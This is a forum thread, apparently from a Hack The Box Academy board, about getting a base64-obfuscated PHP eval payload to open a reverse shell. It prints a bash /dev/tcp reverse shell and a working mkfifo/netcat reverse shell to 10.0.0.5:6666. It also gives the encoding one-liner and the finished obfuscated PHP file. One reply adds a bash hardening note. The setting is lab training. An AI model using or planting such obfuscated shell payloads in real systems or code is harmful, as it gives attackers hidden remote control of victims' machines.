Using eval(base64_decode(''));

HTB Content Academy
,
1

I’m trying to figure out how to execute a php file using the following code written in the file:

eval(base64_decode(“”));

Where the contents within quotes is a base64 encoded string. That string contains the payload:

<?php system('/bin/bash -i >& /dev/tcp/10.0.0.5/6666 0>&1'); ?>

I’m testing this in my kali VM using the following commands:

php -f test.php
./test.php

The former simply echos the explicit contents to terminal; “eval(base64_decode…”

The latter shows the errors:
./test.php line 1: syntax error near the unexpected token `base64_decode’

./test.php line 1: `eval(“base64-encoded-payload”));’

I’ve got a netcat listener setup on port 6666. Nothing happens. Can anyone point me in the right direction with this?

2

Some PHP script examples to show the execution of PHP script with eval function and bash script with system function:

$ cat script-A.php 
<?php
 echo date("o-m-d"), ": this is php script code running\n";
?>

$ php script-A.php 
2022-10-07: this is php script code running


$ cat script-B.php 
<?php
 echo "php starts bash\n";
 eval( "system(\"echo \$(date -I) : running bash script in eval function\");" );
?>

$ php script-B.php 
php starts bash
2022-10-07 : running bash script in eval function


$ cat script-C.php 
<?php
 $code="c3lzdGVtKCJlY2hvICQoZGF0ZSAtSSkgOiBydW5uaW5nIGJhc2ggc2NyaXB0IGluIGV2YWwgZnVuY3Rpb24iKTs=";
 echo "php evaluates: ", base64_decode($code), "\n";
 eval( base64_decode($code) );
?>

$ php script-C.php 
php evaluates: system("echo $(date -I) : running bash script in eval function");
2022-10-07 : running bash script in eval function

The string in the eval function is php code to evaluate. The string contains no <php and ?> around the PHP code.

1 Like
3

Hey I appreciate very much the examples you provided. It turns out I was using double php tags because of the ones in the payload itself; as your last comment suggested. Thank you.

The final result looks like:

echo “system(‘rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.0.0.5 6666 > /tmp/f’);” | base64 -w 0

I then copied the base64 string into a file as such:

<?php eval( base64_decode("c3lzdGVtKCdybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL2Jhc2ggLWkgIDI+JjEgfCBuYyAxMC4wLjAuNSA2NjY2ID4gL3RtcC9mJyk7Cg==") ); ?>

The former shell using /dev/tcp didn’t work either, though. The piped version does.

4

/dev/tcp/host/port and also /dev/udp/host/port are interpreted by the bash shell. There exists no /dev/tcp in the virtual Unix file system.

The bash can be harden with the option ‘disable-net-redirections’. Such as bash does not interpret the /dev/tcp/... and /dev/udp/... special file names.

See: Installing Bash: Optional Features

Debian used this configuration up to version 4. Debian bash changelog 5.0

1 Like